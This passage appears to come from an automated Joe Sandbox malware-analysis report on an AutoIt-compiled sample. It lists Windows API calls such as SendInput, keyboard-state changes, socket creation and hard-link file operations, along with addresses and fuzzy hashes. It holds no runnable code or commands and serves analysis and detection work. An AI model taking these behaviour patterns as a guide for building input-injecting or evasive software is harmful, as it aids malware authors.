                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C341D5
                Strings
                Similarity
                • API ID: MessageSend$MoveWindow
                • String ID: Listbox
                • API String ID: 3315199576-2633736733
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 00C15362
                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C153B6
                • SetErrorMode.KERNEL32(00000000,?,?,00C3DCD0), ref: 00C1542A
                Strings
                Similarity
                • API ID: ErrorMode$InformationVolume
                • String ID: %lu
                • API String ID: 2507767853-685833217
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetMenuItemInfoW.USER32 ref: 00C36220
                • SetMenuItemInfoW.USER32 ref: 00C3624D
                • DrawMenuBar.USER32(?,?,00000030,?,00000030), ref: 00C3625C
                Strings
                Similarity
                • API ID: Menu$InfoItem$Draw
                • String ID: 0
                • API String ID: 3227129158-4108050209
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00BFE73D
                • FreeLibrary.KERNEL32 ref: 00BFE763
                Strings
                Similarity
                • API ID: AddressFreeLibraryProc
                • String ID: GetSystemWow64DirectoryW$X64
                • API String ID: 3013587201-2590602151
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • socket.WSOCK32(00000002,00000002,00000011), ref: 00C2245A
                • WSAGetLastError.WSOCK32 ref: 00C22468
                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C224E7
                • WSAGetLastError.WSOCK32 ref: 00C224F1
                Similarity
                • API ID: ErrorLast$socket
                • String ID:
                • API String ID: 1881357543-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C160DD
                • GetLastError.KERNEL32(?,00000000), ref: 00C16103
                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C16128
                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C16154
                Similarity
                • API ID: CreateHardLink$DeleteErrorFileLast
                • String ID:
                • API String ID: 3321077145-0
                • Opcode ID: 8ef21383d83602cc51ce316e047bcc602d829d4f9004e398a1dd6cbfff88ab6f
                • Instruction ID: e6f21a700f1ebfaa22b2a80d2a9fc2fd59edacd5ea628664aa3857da90f4aed2
                • Opcode Fuzzy Hash: 8ef21383d83602cc51ce316e047bcc602d829d4f9004e398a1dd6cbfff88ab6f
                • Instruction Fuzzy Hash: 6A414939600610DFCB11EF15C454A5EBBE2EF8A720B198488EC5AAF362CB31FD41DB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C0B388
                • SetKeyboardState.USER32(00000080), ref: 00C0B3A4
                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C0B412
                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C0B464
                Similarity
                • API ID: KeyboardState$InputMessagePostSend
                • String ID:
                • API String ID: 432972143-0
                • Opcode ID: 43ab3b92ac12d14d72c0f911f1e9893f035e7a8e6c80b02aa70df61f3a107431
                • Instruction ID: d26bf2591a83338bb8a7057b61c2df8a39eb9eb1fb048acce1ffa6bbd20b804f
                • Opcode Fuzzy Hash: 43ab3b92ac12d14d72c0f911f1e9893f035e7a8e6c80b02aa70df61f3a107431
                • Instruction Fuzzy Hash: 48315970A50318AEFF30CBA5C8057FEBBA5AF44710F14862AF0A5921E1C7748F45D7A2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetForegroundWindow.USER32 ref: 00C3204A
                  • Part of subcall function 00C042CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C042E6
                  • Part of subcall function 00C042CC: GetCurrentThreadId.KERNEL32 ref: 00C042ED
                  • Part of subcall function 00C042CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C02E43), ref: 00C042F4
                • GetCaretPos.USER32(?), ref: 00C3205E
                • ClientToScreen.USER32(00000000,?), ref: 00C320AB
                • GetForegroundWindow.USER32 ref: 00C320B1
                Similarity
                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                • String ID:
                • API String ID: 2759813231-0
                • Opcode ID: dd31398b493d1536bbf090bbaa1cc8de969947c72409598e3a5d652043020769
                • Instruction ID: cbcd7d003f5d199160f36d7c836b1b7c7be9a470f731a8e71b5ebd7e980badb4
                • Opcode Fuzzy Hash: dd31398b493d1536bbf090bbaa1cc8de969947c72409598e3a5d652043020769
                • Instruction Fuzzy Hash: FB315271E14109AFCB04DFAAC881DAEB7FCEF49304B1084AAE515E7211DA71DE45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BA4154: _wcslen.LIBCMT ref: 00BA4159
                • _wcslen.LIBCMT ref: 00C0E7F7
                • _wcslen.LIBCMT ref: 00C0E80E
                • _wcslen.LIBCMT ref: 00C0E839
                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00C0E844
                Similarity
                • API ID: _wcslen$ExtentPoint32Text
                • String ID:
                • API String ID: 3763101759-0
                • Opcode ID: fdd3bc1a9d9849592a3dce698e259853c79c37cd6bc9ff48f63ce950ee18bd50
                • Instruction ID: 5de8145f1ed1e826dea6145f59584782c0593b4f65bc08dc856a0f2f5641f024
                • Opcode Fuzzy Hash: fdd3bc1a9d9849592a3dce698e259853c79c37cd6bc9ff48f63ce950ee18bd50
                • Instruction Fuzzy Hash: 9221A371D40214AFDB10AFA8C981BAEB7F8EF45750F1481A9F914FB291D7709E41C7A1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetWindowLongW.USER32(?,000000EC), ref: 00C33169
                • SetWindowLongW.USER32 ref: 00C33183
                • SetWindowLongW.USER32 ref: 00C33191
                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C3319F
                Similarity
                • API ID: Window$Long$AttributesLayered
                • String ID:
                • API String ID: 2169480361-0
                • Opcode ID: 9be411f8d65040680ff9e1599737f07c6dd7af42fd127b54487c0f92ca785a8f
                • Instruction ID: 2ac4079a115deedbb08584ae5859d61e79653a2c324f545b23a7da9f88d71c78
                • Opcode Fuzzy Hash: 9be411f8d65040680ff9e1599737f07c6dd7af42fd127b54487c0f92ca785a8f
                • Instruction Fuzzy Hash: CF21D031228551AFE7159B14CC44FAE7BA5EF86324F148158F46A8B2D2CB71EE82CB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00C0960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C08199,?,000000FF,?,00C08FE3,00000000,?,0000001C,?,?), ref: 00C0961B
                  • Part of subcall function 00C0960C: lstrcpyW.KERNEL32 ref: 00C09641
                  • Part of subcall function 00C0960C: lstrcmpiW.KERNEL32(00000000,?,00C08199,?,000000FF,?,00C08FE3,00000000,?,0000001C,?,?), ref: 00C09672
                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C08FE3,00000000,?,0000001C,?,?,00000000), ref: 00C081B2
                • lstrcpyW.KERNEL32 ref: 00C081D8
                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C08FE3,00000000,?,0000001C,?,?,00000000), ref: 00C08213
                Strings
                Similarity
                • API ID: lstrcmpilstrcpylstrlen
                • String ID: cdecl
                • API String ID: 4031866154-3896280584
                • Opcode ID: 8683848e2ae879e8cb259ac794221fdf4cd2dbca31082c8bf973d7b81d0064af
                • Instruction ID: 8424b891c92d337e8bfc06984b649f7f312b1dfd86f1046994f8c04ab9bf9c34
                • Opcode Fuzzy Hash: 8683848e2ae879e8cb259ac794221fdf4cd2dbca31082c8bf973d7b81d0064af
                • Instruction Fuzzy Hash: 1511087A200301ABCB146F34D845F7E77E9FF99350B50802AF986CB2A0EF329915D7A0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetWindowLongW.USER32(?,000000F0), ref: 00C3866A
                • SetWindowLongW.USER32 ref: 00C38689
                • SetWindowLongW.USER32 ref: 00C386A1
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C1C10A,00000000), ref: 00C386CA
                  • Part of subcall function 00BA2441: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA2452
                Similarity
                • API ID: Window$Long
                • String ID:
                • API String ID: 847901565-0
                • Opcode ID: c09c8c4916a654769f68f957159e071e0499f67b6847c8530778c1803b76e212
                • Instruction ID: 2ee5d106bd2664fc0ecfbe198d5939a0d10c28d9814dcacdd15d581de1585f13
                • Opcode Fuzzy Hash: c09c8c4916a654769f68f957159e071e0499f67b6847c8530778c1803b76e212
                • Instruction Fuzzy Hash: 57117F72520715AFCB109F29DC09B6A3BB5EB45370F154724F939DB2E0DB309A59CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 50ed00dac2763e665b869a6bd402a244aef5553c3fd9225b2918285c99d1b90a
                • Instruction ID: 4f2f44af654d8ce2b72fc08cfb39373cff8d42feef0d56fcaffe39d3913f781d
                • Opcode Fuzzy Hash: 50ed00dac2763e665b869a6bd402a244aef5553c3fd9225b2918285c99d1b90a
                • Instruction Fuzzy Hash: C00184B22056557EF7212778ACC2F2BA68DDF62378B3543B7B521613D1FA608C404570
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,000000B0,?,?), ref: 00C022D7
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C022E9
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C022FF
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C0231A
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: f8a75b764bb567eeef0c00ea8b7c8d3d79d6559404c52d819a69695c0893ef25
                • Instruction ID: d5b75ab6ae2f70dc2cc9408d1786365db7628b29e5ac0e281a04ca470dbdb6e1
                • Opcode Fuzzy Hash: f8a75b764bb567eeef0c00ea8b7c8d3d79d6559404c52d819a69695c0893ef25
                • Instruction Fuzzy Hash: 5B11093A900218FFEB119BA5CD85F9DFBB8EB08750F200091EA11B7290D6716E10DB94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BA2441: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA2452
                • GetClientRect.USER32 ref: 00C3A890
                • GetCursorPos.USER32(?), ref: 00C3A89A
                • ScreenToClient.USER32 ref: 00C3A8A5
                • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 00C3A8D9
                Similarity
                • API ID: Client$CursorLongProcRectScreenWindow
                • String ID:
                • API String ID: 4127811313-0
                • Opcode ID: 2aecbfdec3813a376c3b15fc4fa9b58a23f65a8c2d72838406b3ac8802b36042
                • Instruction ID: 080d7cd34a9f9f8ac296251829a2311315d907845d1c1098b9f22074104ffd38
                • Opcode Fuzzy Hash: 2aecbfdec3813a376c3b15fc4fa9b58a23f65a8c2d72838406b3ac8802b36042
                • Instruction Fuzzy Hash: BE111872911119FFDF14EF98D845AEE77B8FB05300F104555F962E3190D730AA92DBA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetWindowRect.USER32 ref: 00C38792
                • ScreenToClient.USER32 ref: 00C387AA
                • ScreenToClient.USER32 ref: 00C387CE
                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C387E9
                Similarity
                • API ID: ClientRectScreen$InvalidateWindow
                • String ID:
                • API String ID: 357397906-0
                • Opcode ID: 98dd3380eb5d3a851c78295ba6389a36e485ab65c628f0a0ab8ec20c488b1d06
                • Instruction ID: e5b53314e27473b54edcbceadb82c8f827adafce9c0dfb80dfa70444628038ec
                • Opcode Fuzzy Hash: 98dd3380eb5d3a851c78295ba6389a36e485ab65c628f0a0ab8ec20c488b1d06
                • Instruction Fuzzy Hash: 9A1140B9D00209EFDB41CFA8D885AEEBBB5FB08310F108166E925E3210D735AA558F50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BA1ED9: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BA1F33
                  • Part of subcall function 00BA1ED9: SelectObject.GDI32(?,00000000), ref: 00BA1F42
                  • Part of subcall function 00BA1ED9: BeginPath.GDI32(?), ref: 00BA1F59
                  • Part of subcall function 00BA1ED9: SelectObject.GDI32(?,00000000), ref: 00BA1F82
                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C391E6
                • LineTo.GDI32(?,?,?), ref: 00C391F3
                • EndPath.GDI32(?), ref: 00C39203
                • StrokePath.GDI32(?), ref: 00C39211
                Similarity
                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                • String ID:
                • API String ID: 1539411459-0
                • Opcode ID: 211cb7b543c9d3dcff6ea58cbc39292b3ba4d806245f5581085f03f85b8c338e
                • Instruction ID: ee5b704c2b2c73d5741ae5b10ed4c024404e6d94ef3e46aa5e53194f30d710f2
                • Opcode Fuzzy Hash: 211cb7b543c9d3dcff6ea58cbc39292b3ba4d806245f5581085f03f85b8c338e
                • Instruction Fuzzy Hash: 1DF05E31055659BBDB126F54AC0DFCE3F69AF06711F048100FA12250E2C7B55661CBE9
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSysColor.USER32(00000008), ref: 00BA216C
                • SetTextColor.GDI32(?,?), ref: 00BA2176
                • SetBkMode.GDI32(?,00000001), ref: 00BA2189
                • GetStockObject.GDI32(00000005), ref: 00BA2191
                Similarity
                • API ID: Color$ModeObjectStockText
                • String ID:
                • API String ID: 4037423528-0
                • Opcode ID: fd2823e93c732163aa6fbe1b40c70672f9540bc1f1ff08d8f83b339ab177f0b2
                • Instruction ID: 4a130110b04979afb8193401cb62af1d6ca490d933b1c62607ea983246475294
                • Opcode Fuzzy Hash: fd2823e93c732163aa6fbe1b40c70672f9540bc1f1ff08d8f83b339ab177f0b2
                • Instruction Fuzzy Hash: 75E06D31254280AFDB215B79BC09BEC7BA0EB12736F048259F6BB590E0C3B246409B10
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __startOneArgErrorHandling.LIBCMT ref: 00BCE69D
                Strings
                Similarity
                • API ID: ErrorHandling__start
                • String ID: pow
                • API String ID: 3213639722-2276729525
                • Opcode ID: 39612269ad46f37d241185b7e5043c0e270e1420b12676f88db903d6e66f417e
                • Instruction ID: edb2b436355656be3c3c2fc81e899c814db1e742b75a4ed273d0d667c820169b
                • Opcode Fuzzy Hash: 39612269ad46f37d241185b7e5043c0e270e1420b12676f88db903d6e66f417e
                • Instruction Fuzzy Hash: 5C514761A19101D6DB117B14DD42B6EBBE4FB50702F3089EEE0A5423A8FF35CC9A9B46
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Similarity
                • API ID:
                • String ID: #
                • API String ID: 0-1885708031
                • Opcode ID: 4a30864edbca2c97677ca788dd9bd3f01f7dd9a0ab302438e6eac6e5d69b826e
                • Instruction ID: f0cad7c4c30d7d0a6e489369530929be4624ca36a712bc474bf55d2c6306123a
                • Opcode Fuzzy Hash: 4a30864edbca2c97677ca788dd9bd3f01f7dd9a0ab302438e6eac6e5d69b826e
                • Instruction Fuzzy Hash: A651203490824A9FCF25DF28C481AFABBE0EF16310F6840D5E9919B3D0DB709D4ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Similarity
                • API ID: BuffCharUpper_wcslen
                • String ID: CALLARGARRAY
                • API String ID: 157775604-1150593374
                • Opcode ID: 81f5443c2768d9a26aeec3c91173a045e16d2d914afcfa1bc0f24bb19b88c431
                • Instruction ID: f1eed0bebbfb26675070a67bd5f66843268a5ee15e489086f811b817ad639503
                • Opcode Fuzzy Hash: 81f5443c2768d9a26aeec3c91173a045e16d2d914afcfa1bc0f24bb19b88c431
                • Instruction Fuzzy Hash: DB41C271A002299FCF04DFA9D8819FEBBF5FF59320F144169E416A7292D770AE91CB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BA771B: CreateWindowExW.USER32 ref: 00BA7759
                  • Part of subcall function 00BA771B: GetStockObject.GDI32(00000011), ref: 00BA776D
                  • Part of subcall function 00BA771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA7777
                • GetWindowRect.USER32 ref: 00C340D9
                • GetSysColor.USER32(00000012), ref: 00C340F3
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$ColorCreateMessageObjectRectSendStock
                • String ID: static
                • API String ID: 1983116058-2160076837
                • Opcode ID: 7fc09341dee573a85dcc752159ffb3aa009ae7baf1d4b8cb4e48c013e09b8727
                • Instruction ID: 41c451166e4ec2b5144ed09b7956321771669dc3a92535ead549a65b25746edb
                • Opcode Fuzzy Hash: 7fc09341dee573a85dcc752159ffb3aa009ae7baf1d4b8cb4e48c013e09b8727
                • Instruction Fuzzy Hash: 6B112972620209AFDF05DFA8DC46AEE7BB8FB08314F004925F955E3150E675E851DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C025DC
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                • Opcode ID: b52adefc520382151ef7c84cd2bfc71d5858b808232d9a552ee895b8bf6958f6
                • Instruction ID: b09b6f1a5599d798d7a7456d89208b33dc12a5e243338acfcbb0de9e6efe4445
                • Opcode Fuzzy Hash: b52adefc520382151ef7c84cd2bfc71d5858b808232d9a552ee895b8bf6958f6
                • Instruction Fuzzy Hash: F801D471604229BBCB28EBA4CC65DFE77A9AF56310B040619B872972D7EA309908D654
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C024D6
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                • Opcode ID: 8139e2929aab15bee245b9f4ecdb667cecc6972222076b36b4945cdea671bcf5
                • Instruction ID: 5c7dd2079e0c40805853e8a2f399a1c1f407bac65bb18d2e071d8cda73ae8672
                • Opcode Fuzzy Hash: 8139e2929aab15bee245b9f4ecdb667cecc6972222076b36b4945cdea671bcf5
                • Instruction Fuzzy Hash: 3A01A271A44109BBDF28EBA0CC56FFF77E99F56340F14002AA552632C7DA509E08D671
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C02558
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                • Opcode ID: 5be22e96e4208d2cf8100dbf0d06d6cec35d50a4c6aa3f32d3061d1af1e72ee6
                • Instruction ID: 934274580afe522449ec1ebae361f13eea13653450e499d10b56e63a6fc3dc46
                • Opcode Fuzzy Hash: 5be22e96e4208d2cf8100dbf0d06d6cec35d50a4c6aa3f32d3061d1af1e72ee6
                • Instruction Fuzzy Hash: A201A271644109B7CB24EBA4CD5AFFF77EC9B12740F1400257952A32C2EA249F08D675
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C02663
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                • Opcode ID: e796087f8a55d389720c398764d70ec9252dba90d01b849230c9154a626ab4b2
                • Instruction ID: 54f144fee9a8eb74661abc2e719c47310e1d718f1a50187e29a48c40988d5a1f
                • Opcode Fuzzy Hash: e796087f8a55d389720c398764d70ec9252dba90d01b849230c9154a626ab4b2
                • Instruction Fuzzy Hash: 8EF0A471A44219B7CB24E7A48C56FFF77B8AF12710F040A26B572A32C7DB615908D250
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C013B3
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Message
                • String ID: AutoIt$Error allocating memory.
                • API String ID: 2030045667-4017498283
                • Opcode ID: a66e0d76d364d5d950e6c29eec52a93caa8d6e3d612369ef0a035a74f49de916
                • Instruction ID: 2f9b2d153e743f2aaafd15ef18895b11841c73aa4b291f6937e3eed5d74b7061
                • Opcode Fuzzy Hash: a66e0d76d364d5d950e6c29eec52a93caa8d6e3d612369ef0a035a74f49de916
                • Instruction Fuzzy Hash: 28E0DF3226832826D6203794BC07F89B7C88F09B21F15046AFB5D788C28EE224904299
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BBFAE2: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BC1102,?,?,?,00BA100A), ref: 00BBFAE7
                • IsDebuggerPresent.KERNEL32(?,?,?,00BA100A), ref: 00BC1106
                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BA100A), ref: 00BC1115
                Strings
                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BC1110
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                • API String ID: 55579361-631824599
                • Opcode ID: c54fddc0a4ec1af27af9f93c29b3fe8be51c7bf1106da498bf24683b37423695
                • Instruction ID: 11034a12e420b4141b8c7d957847e96e6acf50efdbcc39d69c8d0c9783138566
                • Opcode Fuzzy Hash: c54fddc0a4ec1af27af9f93c29b3fe8be51c7bf1106da498bf24683b37423695
                • Instruction Fuzzy Hash: 88E092706007108BD7309F28E814757BBF4FF05301F148DACE986E2652E7B9D844CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
